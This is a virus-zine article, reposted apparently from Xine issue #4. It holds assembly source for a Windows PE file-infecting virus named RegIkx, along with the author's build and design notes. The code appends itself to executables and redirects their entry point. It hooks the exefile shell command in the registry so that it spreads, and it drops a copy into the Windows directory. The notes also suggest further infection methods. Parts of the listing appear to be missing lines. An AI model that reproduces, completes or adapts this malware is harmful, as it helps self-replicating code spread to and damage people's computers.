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Xine - issue #4 - Phile 205

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 · 6 months ago

| Xine - issue #4 - Phile 205 |

;Again a new virus idea, for a long time I have chatted away about
;this type of virus. Finaly relaizing that no one else wanted to do this
;I did it. This was a what i call a dead time project. Whenever I had
;spare time I worked on it sometimes it sat for a month b4 I looked at it
;again. This lead to strange code, due to every time I did feel like
;working on it I was intrigue with a new concept, nothing major, but enough
;to make the code seem more hodgepodge then my usual mess :>. (Sorry to all
;the coders who do not like upper and lower mix of chars, but I sorta like it)
;Alright the program is made up to 2 parts One a regular PE file made by tasm
;but modified with debug.

;First it is compile with
;tasm32 /ml /m3 reg,;
;tlink32 /Tpe /aa /c /B:0400000 -x reg,r1,,,
;this creates a file that has .DATA only section , I hand code the IData stuff
;see cerebrus virus for more info on this
;then I use a debug script to modify a few things

;Increase Header size to 600h Allow the full header
; to be copy into Memory

;Set Idata Location So OS knows where to load the Idata
;Set Idata Size
;Set Flags of the DATA sect to R/W/Exec Not really need since data will
; execute fine
;Edit the BASE of the Code Since I have no code section
;Edit Size of Code Tasm does not set these and WinNt
; Chokes if not set properly

;Move the PE Header from 100h to 80h Why not, actual gives me more free
; space in one spot for say other
; viruses Not really use in this virus
;Move any code up to the end of the header area again not really use in this
;virus just an idea I was curoius about.
;Allright now we have a 2000h exe which when run will look for the command line
;and execute the exe file if it is there
;Now before it executes the file it will infecting using standard technique of
;expanding the last section and ensuring the last section is r/w
;How may you ask does the file get someone to give it a exe name as a command
;line you may ask. When the file it has infected is run the second part of
;the code it run. Using standard vx technique's to find the k32 API it needs
;It first reads the Registry entry "HKEY_CLASSES_ROOT\exefile\shell\test\command",0
; it checks if the entry starts with RegIkx.exe, if so dont bother if not
;it writes the entry "RegIkx.exe" %1 %*
;(So when someone right clicks on the mouse over a ExeFile they will see
;Test as one of the Options if then then click test windows runs
;"Regikx.exe" FullPathFileName CommandLine Parms this is how the file spreads)
;Now it gets the Windows Directory and creats RegIkx.exe in it. then
;close the File, close the Registry and jmps back to the host
;Clear as Murky Water right :>
;I Use a space as first char of the last section name to id file as infected
;Display a poem when no command line is passed to it
;may as well confuse the issue in case a user does decide to run the exe by
;Well the rest is in the code, you can recompile with a Diffrent Register
;setting which will then call RegIkx every time the user clicks on a exe
;I have that setting rem out for testing purposes
;Well enjoy and Read the code
;As usual what follows is notes I made as I was working on this
;This is being compile with no code of idata section
;only the a DATA section which in Win9? can still execute code???
;as a side note this seems that while code is code data it code as well
;you can then put code in the k32 data section and execute it....
;not sure if winnt supports this but I did try stack space in winnt 4.0,
;yes it let me execute it fine.
;to be sure I am altering the flags to be code and exec as well as
;the data the flags will then be 600000E0
;The "RealFile will infect the files off the commandline
;copying the first 600h bytes from the MZ header then copy the
;next 600 from the start of the "virii" code down the infect addtion
; to the end file should be about 800-900; probaly be easier to copy
;the header to the top of the section then we can add and change things as we
;Why 600 when the header size is usual 400h simple Borland pads everthing
;so there is a extra 200 bytes that lay in waste on disk but do not get loaded
;to memory, unless you make the header size 600h which I do in the debug
;so the file looks like this
; on disk in memory after move
; ---------------- -----------------
; MZ 400000 MZ
; 80 PE 80 PE
; data or code data or code but exec not Write
; 600 Excutable code 600 End of header
; idata cod data 401000 MZ
; 80 PE
; Usable Data or code r/w exec
; 600 Idata code data
;Now when writing this file as infection write from 401000 to end of code
;to recreate Excutable file write from 401000 for lenght of code pad to 4096
;****Note in winnt4.0 the file would just "exit" do nothing or at least
;appear to do that. Under Td32 in NT it would "error loading program"
;So I made entries to the SizeOfCode and BaseOfCode this allow it to work
;but then failed cause I cheated and used "USER32" not "USER32.DLL ok adjusted for
;that and all OK..Cept run from command line only file name but click on then
;full path name was passed. Oh well, I guess that there are some incompatiblity
;with the win32 subsets ;))

;Reg setting exefile infect "D:\TASM\VIRII\REGHOOK\R1.EXE" %1 %*
;Of course in real virus the exe would be in a windows directory
;so "R1.EXE" %1 %* would work fine and Of course I use RegIkx.exe for
;final edition

;ideas to play with
; Stack Infector use stack for code and data
; modify the .text section to be data as well then you can write the
; orginal "host" back after spreading
; have a small "dos" prog modify one of the system dll's for code to data
; the real virus code then goes tsr at the second run
; Write code that infects the data section and runs from there as well
; just mod the eip to pnt there this opens up the idata,data,resc,reloc
; just about any section can be infected... 'cept AV'ers check this
; While I do not try to hide from AV'rs scanners I do try to mention methods
;that Av'ers should use

.model flat, stdcall

;Used for access to the Registery
HKEY_CLASSES_ROOT equ 80000000h
REG_SZ equ 1

;sometime I used this, note that many API return nonzero to signify
; True so True != 0 is a better check
True equ 1
False equ 0

;MZ pnter to PE or NE or LE ...
NEptr equ 03ch

;Locations in PE header use JQwerty's(29A) inc files for more complete
;header info and other nice tricks
SectHdrSze equ 028H
ImageSze equ 050h
PEHdrSze equ 0F8h

;PE Header Offsets
NumOfSect equ 6
EipOff equ 28h
SectAlign equ 38h
FileAlign equ 3Ch

;Section Entry Offsets
SectName equ 0h
SectVsze equ 8h
SectVadd equ 0Ch
SectRawSze equ 10h
SectPtrRaw equ 14h
;Stuff not used
SectChar equ 24h

;USed in CreateFile API calls
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h

;Used for the Idata Section to get proper offsets
;I sometime have very convolted code that could be replaced with
; One static equ rather than the nonsense I typed, live with it...
;better yet..consider it a exercise for the student...

LoadAT equ 01000h
offs equ offset PEheader ;+ LoadAT + 400000h

filler equ offset Data - PEheader

;Start of Code which is actaul in a section called Data

.data ;the data area
PEheader: ;will hold the Orginal MZ/PE info
db 1A0h dup (00h)
;Anything beyond this is data that will be carrier over from
;infection to infection after the first infection this will
;be copyed to a buffer area to be used for our code
;I used a debug script to make the intial file
;in most case this is just for placeholders exeptions are strings
;or numerics the virus really needs then they would be placed here
;then moved by the debug script
sBlank db ' ',0
Temp dd ? ;Used for temp storage
fHandle dd ? ;Open File Handle
PtrAddNew dd ? ;Where the write the New Info

AddSize dd ? ;Amount we have added to the file

;NewEip dd ?

ProcessInfo dd 4h dup(?)
StartupInfo dd 18h dup(?)

FileName db 256 dup(0)
EXEcName db 256 dup(0)

crTime dd 2 dup (0)
laTime dd 2 dup (0)
lwTime dd 2 dup (0)

;*******temp db "c:\windows\notepad.exe",0

BodyTitle db "Stoddart, And It Never Comes Again",00h
BodyMsg db "There are gains for all our losses,",0dh,0ah
db " There are balms for all our pain,",0dh,0ah
db "But when youth, the dream, departs",0dh,0ah
db "It takes something from our hearts,",0dh,0ah
db " and it never comes again",0dh,0ah
db 0dh,0ah,0dh,0ah,0dh,0ah
db " Murkry/IkX",0dh,0ah
db "Making life fun through 'tronic life",0dh,0ah
db " RegIkx.ExE",0dh,0ah,00
;Data area stops and the place holder takes over
;place holder used the formala so the IDATA always starts at 600h

Data: ;place holder so we pad this out properly
db 600h - filler dup (00h)
;The Infection part of the Virus uses the
DD offset API_LOC2b - offset PEheader + LoadAT
; usual this has a redunat entry
;We are not skipping it
; offset API_LOC1 - offset PEheader + LoadAT

T1: dd 0 ;time date stamp
dd 0 ;where in memory this dll is loaded

DD offset DLL1 - offset PEheader + LoadAT

DD offset API_LOC2 - offset PEheader + LoadAT

;--------second DLL

DD offset API_LOC2Ab - offset PEheader + LoadAT
; usual this has a redunt entry
;We are not skipping it
; offset API_LOC1 - offset PEheader + LoadAT

T2: dd 0 ;time date stamp
dd 0 ;where in memory this dll is loaded

DD offset DLLA - offset PEheader + LoadAT

DD offset API_LOC2A - offset PEheader + LoadAT
DD 00000000H

DB 10H DUP(0)

exitp DD offset FUNC1 - offset PEheader + LoadAT ;
beep DD offset FUNC2 - offset PEheader + LoadAT ;4h
;VxdCall0 DD 80000001h ;8h
getcomline DD offset FUNC3 - offset PEheader + LoadAT ;Ch
createp DD offset FUNC4 - offset PEheader + LoadAT ;10h
Copy DD offset FUNC5 - offset PEheader + LoadAT
Create DD offset FUNC6 - offset PEheader + LoadAT
FileP DD offset FUNC7 - offset PEheader + LoadAT
Read DD offset FUNC8 - offset PEheader + LoadAT
Write DD offset FUNC9 - offset PEheader + LoadAT
Close DD offset FUNC10 - offset PEheader + LoadAT
FindFirst DD offset FUNC11 - offset PEheader + LoadAT
FindNext DD offset FUNC12 - offset PEheader + LoadAT
CloseFind DD offset FUNC13 - offset PEheader + LoadAT
FileSize DD offset FUNC14 - offset PEheader + LoadAT
WinEx DD offset FUNC15 - offset PEheader + LoadAT
GetTime DD offset FUNC16 - offset PEheader + LoadAT
SetTime DD offset FUNC17 - offset PEheader + LoadAT
DD 0
msgbox DD offset FUNCA - offset PEheader + LoadAT

DD 0

SizeAPIAdd equ $ - Offset API_LOC2

exitpb DD offset FUNC1 - offset PEheader + LoadAT ;
beepb DD offset FUNC2 - offset PEheader + LoadAT ;4h
;VxdCall0b DD 80000001h ;8h
getcomlineb DD offset FUNC3 - offset PEheader + LoadAT ;Ch
createpb DD offset FUNC4 - offset PEheader + LoadAT ;10h
Copyb DD offset FUNC5 - offset PEheader + LoadAT
Createb DD offset FUNC6 - offset PEheader + LoadAT
FilePb DD offset FUNC7 - offset PEheader + LoadAT
Readb DD offset FUNC8 - offset PEheader + LoadAT
Writeb DD offset FUNC9 - offset PEheader + LoadAT
Closeb DD offset FUNC10 - offset PEheader + LoadAT
FindFirstb DD offset FUNC11 - offset PEheader + LoadAT
FindNextb DD offset FUNC12 - offset PEheader + LoadAT
CloseFindb DD offset FUNC13 - offset PEheader + LoadAT
FileSizeb DD offset FUNC14 - offset PEheader + LoadAT
WinExb DD offset FUNC15 - offset PEheader + LoadAT
GetTimeb DD offset FUNC16 - offset PEheader + LoadAT
SetTimeb DD offset FUNC17 - offset PEheader + LoadAT
DD 0
msgboxb DD offset FUNCA - offset PEheader + LoadAT

DD 0
;------------------------names of DLL


dw 0 ;ends dll names

FUNC1 dw 0
db 'ExitProcess',0

FUNC2 dw 0
DB 'Beep',0

FUNC3 dw 0
DB 'GetCommandLineA',0

FUNC4 dw 0
db 'CreateProcessA',0

FUNC5 dw 0
db 'CopyFileA',0

FUNC6 dw 0
db 'CreateFileA',0

FUNC7 dw 0
db 'SetFilePointer',0

FUNC8 dw 0
db 'ReadFile',0

FUNC9 dw 0
db 'WriteFile',0

FUNC10 dw 0
db 'CloseHandle',0

FUNC11 dw 0
db 'FindFirstFileA',0

FUNC12 dw 0
db 'FindNextFileA',0

FUNC13 dw 0
db 'FindClose',0

FUNC14 dw 0
db 'GetFileSize',0

FUNC15 dw 0
db 'WinExec',0

FUNC16 dw 0
db 'GetFileTime',0

FUNC17 dw 0
db 'SetFileTime',0

db 0 ;end of Function list for this DLL

FUNCA dw 0
db 'MessageBoxA',0
dw 0

db 0 ;end the function list
db 0 ;end the DLL list

;By Default this will be R/W Exec section
;move the header into our section
;really so this is info will be R\W
mov eax,VSize
call $ + 5 ;Need any value in our address
pop Eax ;area for GetMZ
Call GetMZ ;Eax will return pntr to MZ header
Mov Esi,Eax
mov Edi,offset PEheader
xor ecx,ecx
mov ch,6 ;600 bytes
rep movsb

;***Get CommandLine
Call FillFileNames

or Eax,Eax ;Eax = Zero then no file to infect or run
je NoFileToExec

Call InfectFile

push Eax
call msgbox, large 0, Offset EXEcName ,offset FileName,Large 1
pop Eax

;this could be used but to failed in one test in winnt
;CALL WinEx, Offset EXEcName, large 1
;there was probaly another issue here

;Run the file using CreateProcess
Call createp, \
offset FileName, \ ;module name
offset EXEcName, \ ;command line
large 0, \ ;sec attr
large 0, \ ;thread sec
Large False, \ ;inherit handles
large 0, \ ;create flags
large 0, \ ;Enviroment
large 0, \ ;current directory
offset StartupInfo, \ ;startup info
offset ProcessInfo ;process info
jmp ExitMain

push Eax
call msgbox, large 0, Offset BodyMsg ,offset BodyTitle,Large 40h
pop Eax



push -1
call exitp
InfectFile PROC

;Open the File r/w using Create file

Call dword ptr [Create] , \
offset FileName, \;File to Open
large 0, \
Large 0, \
large 0, \
large 0

mov dword ptr [fHandle],eax
inc Eax
je @@FileNotOpenErr
;fBuff where to read info to

Call GetTime,[fHandle],offset crTime,offset laTime,offset lwTime

Call Read , \
[fHandle], \ ;handle
offset fBuff, \ ;where to read to
400h, \ ;how much to read
offset Temp, \ ;how much was read
large 0 ;overlapped amount not used win95

Or eax,eax ;Check if All is ok
jz @@ErrorFileOpenErr
cmp dword ptr [Temp],400h ;Did we read all We wanted to
jne @@ErrorFileOpenErr

lea Esi, [fBuff + NEptr] ;Get the ptr to the PE
lodsd ;It would probaly be safer to
or Eax,Eax
jz @@ErrorFileOpenErr ;Not a PE

cmp Eax,1a0h ;If greater than this then avg
jg @@ErrorFileOpenErr ;PE hdr would not fit in remaining
;space so quit

add eax,Offset fBuff ;check for MZ as well
xchg Esi,Eax ;feel free to add that Check
cmp word ptr [ESI],"EP" ;if you Like
jne @@ErrorFileOpenErr

;Next check to see if we have the Section Entry for the
;last Section
;ESI pnts to the PE offset

mov ax,word ptr [Esi + NumOfSect]
cwde ;Convert ax to Eax
dec Eax

mov Ecx,SectHdrSze
mul Ecx

Add Eax,PEHdrSze
cmp Eax,400h
jg @@ErrorFileOpenErr

add Eax,Esi ;Edi = offset to the LastSection
xchg Edi,Eax

;Now need to modify this last section
;Will Need to get FileSize as well....

;Debug just to see last section name if ".?????" infect
;if " ??????" already infected
push Eax
call msgbox, large 0, Edi ,Edi ,Large 1
pop Eax

;check For Infection
mov bl,byte ptr [Edi]
cmp bl,20h ;check for space as first char
je @@InfectedAlready

;Otherwise assume we will infect
mov byte ptr [Edi],20h

;Get Eip and move it to the return area
mov Ebx, dword ptr [Esi + EipOff]
mov dword ptr [RegHook + 1], Ebx

;Set New Eip
mov Ebx,[Edi + SectRawSze] ;Get New Eip
add Ebx,[Edi + SectVadd] ;
add Ebx,Offset RegHook - offset PEheader ;
mov [Esi + EipOff],Ebx ;Store It

;Setup How where we are adding all the code
Mov Eax, dword ptr [Edi + SectRawSze]
Add Eax,dword ptr[Edi + SectPtrRaw]
Mov [PtrAddNew],Eax

;Now We need to modify the last Section entry to
;hold the new code
xor Edx,Edx
mov Eax,VSize
add Eax, dword ptr [Edi + SectRawSze]
dec Eax
or Edx,Edx
jne @@ErrorFileOpenErr

;Update Section Raw Data Size
mov Ecx,[Esi + FileAlign]
add Eax,Ecx
dec Eax
div Ecx
Mul Ecx

;Save how much we will add to the file
Push Eax
sub Eax,[Edi + SectRawSze]
mov [AddSize],Eax
Pop Eax

;save the new raw data size of the section
mov [Edi + SectRawSze],Eax

;Using the new Raw Data Size update
;the Section virtual Size
mov Ecx,[Esi + SectAlign]
dec Eax
add Eax,Ecx
div Ecx
Mul Ecx

;while here lets update the ImageSze as well
;since some progs do not use a correct val in Vsize
;we make sure that our value is at least on a section alignment
push Eax
sub Eax,[Edi + SectVsze]
dec Eax
div Ecx
mul ecx
add [Esi + ImageSze],Eax
pop Eax

mov [Edi + SectVsze],Eax
or [Edi + SectChar],80000000h

;Now move the file ptr to the new size
;write this to the file
;Goto the start of the file and write the new Header
;close the file

;Set the ptr to the place where the old info ended
Call dword ptr [FileP] , [fHandle], dword ptr [PtrAddNew] , large 0, large 0

;Write to the file using Write
Call dword ptr [Write], \;
[fHandle], \;handle
offset PEheader, \;write from
dword ptr [AddSize], \;size
offset Temp, \;how much written
large 0 ;

Call dword ptr [FileP] , [fHandle], large 0 , large 0, large 0

;Write to the file using Write
Call dword ptr [Write], \;
[fHandle], \;handle
offset fBuff, \;write from
0400h, \;size
offset Temp, \;how much written
large 0 ;

Call SetTime,[fHandle],offset crTime,offset laTime,offset lwTime

;Close the file

Call Close, [fHandle]

FillFileNames PROC

call getcomline
;returns EAX = CommandLine

;Due to the way this virus will "hook" the registery it should always
;recieve "regIKX.exe" Host.exe args
;So to find the File we look for .exe
;first move the exe name to the FileNAme
;then Move the Entire line to the EXEcName

;move Eax to the command args

inc Eax ;Get past first "
cmp byte ptr [Eax],'.' ;Find Next
jne @@Next1

mov ebx,dword ptr [eax] ;ebx = "EXE."
cmp EBX,"EXE."
jne @@Next1

inc Eax ;.
inc Eax ;E
inc Eax ;X
inc Eax ;E ;At this point we should be looking at the
;Next file we have to run and potential
;any command line paremters to that file

cmp byte ptr [Eax],'"' ;
jne @@skip
Inc eax
cmp byte ptr [Eax]," " ;
je @@Space ;we have command line info

cmp byte ptr [Eax],00
je @@NoCommandLine

;Load the FileName and EXEcName
mov edi,offset FileName
mov esi,eax

cmp byte ptr [esi]," "
jne @@NextNameByte
inc esi
jmp @@RemoveSpace


cmp al,"."
je @@a1
cmp al,0
je @@NoFileToExec
jmp @@Cn1
mov Ebx,Dword ptr[ Esi -1]
cmp EBX,"EXE."
jne @@Cn1
mov [Edi],Ebx
mov [Edi + 256d],Ebx
lea Esi, [Esi+3]
lea Edi, [Edi+4]
je @@EndExE
mov byte ptr [edi + 255D],al
Jmp @@NextNameByte
push Edi
xor al,al

;finish the EXEcName
pop edi
inc Edi
lea edi,[edi+255D]
mov al,20h
cmp al,00
je @@NameDone
jmp @@Cn3


XOR Eax,Eax


db 68h
dd ?

;I like my GetMZ routine but, I found a major bug
;while the odds are small that it will find a MZ and then a PE that
;is the wrong one it can happen and this virus is an examaple of that
;when it infects a file which has an (PE) file offset of 1000h when you
;round the offset given in the eax to the last offset of 1000h you are
;now pointing at the first byte of this virus in that file then you check
;for MZ, PE you find it ... Not the host start, but the virus start. Oh well
;cant be sure on everything so I "fix" it by ensureing that the
;the value in Eax is one less then the start of the virus
Call H1
H1: Pop Eax
Sub Eax, offset H1 - Offset PEheader
dec Eax
call GetMZ ;Find where this file is loaded then
add [esp + 20h],eax ;fix the return adress

;virus is set to return to the host when done
;now get the pntr off the stack that pnts to a K32 address
;use that to find the address to getprocaddress

mov Eax,[esp + 24h] ;value inside Kernel32
call GetMZ ;Get the start of the k32
or Eax,Eax ;problem bail..
jz UhOh

call GetAPI ;get the Get Process Address
or Eax,Eax
jz UhOh ;problem bail


mov ecx,SizeAPIAdd

Call $ + 5
add dword ptr [esp],Offset API_LOC2b - $ ;push a location
pop Esi

Call $ + 5
add dword ptr [esp],Offset API_LOC2 - $ ;push a location
pop Edi
rep Movsb

xor Eax,EAx
Call $ + 5
add dword ptr [esp],Offset T1 - $ ;push a location
pop Edi

Call $ + 5
add dword ptr [esp],Offset T2 - $ ;push a location
pop Edi


push Eax ;Push the Eax
Call SetReg ;Acual work is done here


;Make Section R\W and Exec
; CreateFile
; SetReg

;Passed to it
;On stack K32 = Kernel32 API
;and that fs:[14] = GetProcessAddress
arg @@K32:DWORD ;args passed to us
;local variable space
local @@hAdv:DWORD ;advapi32 handle
local @@LoadLib:DWORD ;Address if LoadLib

local @@RegOpen:DWORD
local @@RegSet:DWORD
local @@RegQuery:DWORD
local @@RegEnum:DWORD
local @@RegClose:DWORD

local @@Write:DWORD
local @@CreateF:DWORD
local @@CloseH:DWORD
local @@Read:DWORD
local @@hKey:DWORD
local @@mBox:DWORD
local @@Buff:DWORD
local @@Fhandle:DWORD
local @@Temp:DWORD

call @@GetLib
db "LoadLibraryA",0
push @@K32
call fs:[14h]
mov @@LoadLib,Eax

call @@GetAdv
db "Advapi32.dll",0
call @@LoadLib

mov @@hAdv,Eax
or eax,eax ;check to see if all is ok
je @@uups
;Now have all that is needed to read/write to a regisrty
;Try to open the Reg

;Attempt to open the key or create a new one
call @@GL1
db "RegCreateKeyExA",0
push @@hAdv
Call @@GetProcAdd

Call @@Disp
dd ?

;push @@hKey
LEA ESI,@@hKey
push Large 0 ;sec attr null
push 0F003Fh ;regsam
push large REG_OPTION_NON_VOLATILE ;Options

call @@GetNullSt ;null string
db "",0
push 0 ;resv

call @@Gs1
;StrLoc db "exefile\shell\open\command",0 ;for real use
StrLoc db "exefile\shell\test\command",0
call ecx

or Eax,Eax
jne @@uups ;couldn't open the key

;Ok have open the key now read and check if its ours
;Read the string
call @@GL2
db "RegQueryValueExA",0
Push @@hAdv
Call @@GetProcAdd

Call @@GetBufLen
dd 255d

Call $ + 5
add dword ptr [esp],Offset EXEcName - $ ;push a location
pop esi
push esi
mov dword ptr [@@Buff],esi ;of a buffer
;save it
; Call @@GetStr
;@@st db 255d dup(0)

Call @@GetDataType
dd 1
push large 0
push large 0
push [@@hKey]
call Ecx
mov esi,dword ptr[@@Buff]

call $ + 5
add dword ptr [esp],offset @@New - $
pop edi
je @@CloseKey ;allready done
;Ok its there but not ours so just unhook whatever is there and replace it
;need to make our file in the Windows system directory if we cant do that
;bail out
;1 Get windows directory
;2 Try to Create File
; Bail if it exists ???
;3 Write File from top 200 bytes
; then Write again from top for rest of file
;4 close Handle

call @@GetWinDir
db "GetWindowsDirectoryA",0
push @@K32
call fs:[14h]

call $ + 5
add dword ptr [esp],offset FileName - $
pop edi

Push 255D
Push Edi
Call Eax
or Eax,Eax
jz @@Prob

Push Edi

;This is the Key Entry we want to write
;"ReGIkX.exe" %1 %*
add Edi,Eax
mov Eax, "GeR\"
mov Eax,".XkI"
mov Eax,"ExE" + 00

;Ok on Stack is the ptr to the string for our new file
;for the hell of it I'll us the the GetProcAdd and the
;string for CreateFileA in the other part of the Virus

call $ + 5
add dword ptr [esp],offset FUNC6+2 - $ ;Address of Str
Push @@K32
Call @@GetProcAdd

Pop Edi ;New File and Widows Directory

Xor Eax,Eax

Push Eax
Push Eax
Push CREATE_NEW ;Create New File
Push 0
Push 0
Push GENERIC_WRITE ;Only Write
Push Edi

Call Ecx ;CreateFileA

mov [@@Fhandle],Eax
inc Eax
jz @@Prob

;Write to the File
call $ + 5
add dword ptr [esp],offset FUNC9 + 2 - $ ;Address of Str
Push @@K32
Call @@GetProcAdd
mov edi,ecx
Push Large 0 ;Not used Overlapped

;Push @@Temp ;used to hold how much is written
LEA ESI,@@Temp ;

push 600h ;size to write

call $ + 5
add dword ptr [esp],offset PEheader - $ ;Address of
;Start of Virus
Push [@@Fhandle] ;

call Ecx ;Write File

or Eax,Eax
jz @@ProbCloseFile


Push Large 0 ;Not used Overlapped

;Push @@Temp ;used to hold how much is written
LEA ESI,@@Temp ;

push VSize ;size to write
; push 1A00h ;2000h - 600h from above

call $ + 5
add dword ptr [esp],offset PEheader - $ ;Address of
;Start of Virus
Push [@@Fhandle] ;

call Edi ;Write File

or Eax,Eax
jz @@ProbCloseFile

Push Large 0 ;Not used Overlapped

;Push @@Temp ;used to hold how much is written
LEA ESI,@@Temp ;

push (2000h - 600h - VSize) ;size to write

call $ + 5
add dword ptr [esp],offset PEheader - $ ;Address of
;Start of Virus
Push [@@Fhandle] ;

call Edi ;Write File

or Eax,Eax
jz @@ProbCloseFile

push Eax
call @@GetDebug
db "User32.dll",0
call @@LoadLib

call @@DebugMess
db 'MessageBoxA',0
push eax
call fs:[14h]
xchg eax,ecx

push large 1
call @@M1
db "Write File Sucess",0
@@M1: call @@M2
db "GoodBye",0
@@M2: push 0
call Ecx
pop Eax

;close the File
call $ + 5
add dword ptr [esp],offset FUNC10 + 2 - $ ;Address of Str
Push @@K32
Call @@GetProcAdd

mov Eax,[@@Fhandle]
call Ecx



;Now set the Registery key
call @@GL3
db "RegSetValueExA",0
Push @@hAdv
Call @@GetProcAdd

; push large 18D ;Should be lenght of string below
push @@StrLen
call @@GetNew
@@New: db '"ReGIkX.exe" %1 %*',0
@@StrLen equ $ - Offset @@New
push 1
push 0
push 0
push [@@hKey]
call ecx

;Close the key
call @@GL4
db "RegCloseKey",0
Push @@hAdv
Call @@GetProcAdd

push dword ptr [@@hKey]
call Ecx
; push 255d
; call @@strBuf
; db 255d dup(0)


;accepts the procname and the handle of a dll
;returns in ecx the address of the api
ARG @@hAdv:DWORD,@@ProcName:Dword

push @@ProcName
push @@hAdv
call fs:[14h]
xchg eax,ecx
@@GetProcAdd EndP

SetReg EndP
;GetMZ subroutine
;EAX = the address we want to start looking for
;Returns the MZ header location above this
;Should be the Load VA for the program
GetMZ Proc
mov ebp, esp

;Set up a SEH handler
call $ + 5
add dword ptr [esp], Offset @@GetMZ_FindExcept - $
Push dword ptr fs:[0]
mov fs: [0] , esp

;set Esi = eax
Xchg esi, eax

;this checks for the MZ and the PE if both are not found
;but MZ is we assume an error and exit out
;with esi = 0
and esi,0FFFFF000h
Cmp ax,'ZM'
Jne @@GetMZ_NotFound
Add esi, [esi + 3Ah]
dec esi
dec esi

cmp ax,'EP'
je @@GetMZ_Found

xor eax,eax
mov dword ptr [esp + 04h],eax
jmp @@GetMZ_Found ;Not really assume error and return with esi
; = 0

sub esi,1000h
jmp @@GetMZ_LoopFind

mov eax, [esp + 08h]
Lea esp, [eax - 20h]
pop dword ptr fs:[0]
inc esp ;esp + 4
inc esp
inc esp
inc esp
sub esi,1000h
Jmp @@GetMZ_SetSeh

Popa ;esi = the MZ header

;restore the the orginal SEH
Pop dword ptr fs:[0]
Add esp, 4

; Set our Eax to be the return Value
Mov dword ptr [ebp + 1ch],esi


GetMZ EndP

;Takes EAX = K32 VA
;eax = K32 address or 0 if failure
;fs:[14] = GetProcessAddress if Succcess


;LOCAL @@gaWorkSp:dword,@@gaGetPAdd:dword,@@gaNindex:dword,@@gaAddOrd:dword,@@gaAddName:dword,@@gaAddFunc:dword,@@gaLimit:dword,@@gaBASE:dword,@@gaK32:dword

LOCAL @@gaWorkSp:dword
LOCAL @@gaGetPAdd:dword
LOCAL @@gaNindex:dword
LOCAL @@gaAddOrd:dword
LOCAL @@gaAddName:dword
LOCAL @@gaAddFunc:dword
LOCAL @@gaLimit:dword
LOCAL @@gaBASE:dword
LOCAL @@gaK32:dword

pusha ;Save everthing
Mov Ebx,dword ptr[Eax + 3ch]
add Ebx,eax ;get PE location

mov [@@gaBASE],eax ;save VA
push eax

mov [@@gaK32],ebx ;save PE location
mov Eax,[Ebx + 78h] ;Edata Loc

pop ebx
lea Esi,[Eax + Ebx + 10h] ;should be the Base of the Edata
Lea Edi,[@@gaBASE] ;Starting pnt for the ordinal
;exported by this DLL
;now that Esi and Edi point to the correct loactions
;we can just lodsd instead of Mov eax,[]
;then stosd instead of mov [],eax
Lodsd ;save base
Lodsd ;Load the Total
;number of Exports but trash

lodsd ;get and save the Limit
stosd ;this is the number of both
;named and unamed functions Eported

Lodsd ;get and save the address to
add eax,ebx ;the function's

Lodsd ;get and save the address to
add eax,ebx ;the names of the function

Lodsd ;get and save the address to
add eax,ebx ;the ordinals of the function


Mov Esi,[@@gaAddName] ;first adrress of the first name
Mov [@@gaNindex],Esi ;store where we are

Mov Edi,Ebx ;get the load Add of K32
Add Edi, [Esi]
xor Ecx,Ecx
;find GetProcAddress
cmp [Edi],'PteG'
jne gaNextOne

cmp [Edi+4],'Acor'
jne gaNextOne

cmp [Edi+8],'erdd'
jne gaNextOne

cmp word ptr[Edi+0Ch],'ss'
jne gaNextOne

cmp byte ptr [Edi+0Eh],00
jne gaNextOne

jmp gaGotGetProcAdd


inc Ecx
cmp Ecx, [@@gaLimit]
jge gaNotFound1

add dword ptr [@@gaNindex],4
Mov Esi, [@@gaNindex]
Mov Edi, [Esi]
Add Edi, Ebx
jmp gaTryAgain

;ok we have the index into the name array use this to get
; the index into the ord array

shl Ecx,1 ;*2 for a word array
Mov Esi, [@@gaAddOrd]
add Esi,Ecx ;move to the correct spot in the array

Movzx Eax,word ptr [Esi]
;ax = ordinal value

shl Eax,2 ;*4
Mov Esi, [@@gaAddFunc]
Add Esi, Eax

Mov Edi, dword ptr [Esi]
add Edi,ebx ;got the address of it

xchg Eax, Edi
Mov dword ptr [@@gaGetPAdd],eax
jmp gaOkFound


xor Eax,Eax ;damn not found
;set the eax to 0

Mov fs:[14h],Eax ;add the VA to it

or Eax,Eax
jnz gaOK
Mov [Esp + 1ch],Eax ;set Eax to zero for Popa



VSize equ $ - offset PEheader

fBuff db 400h Dup(?)

end Begin

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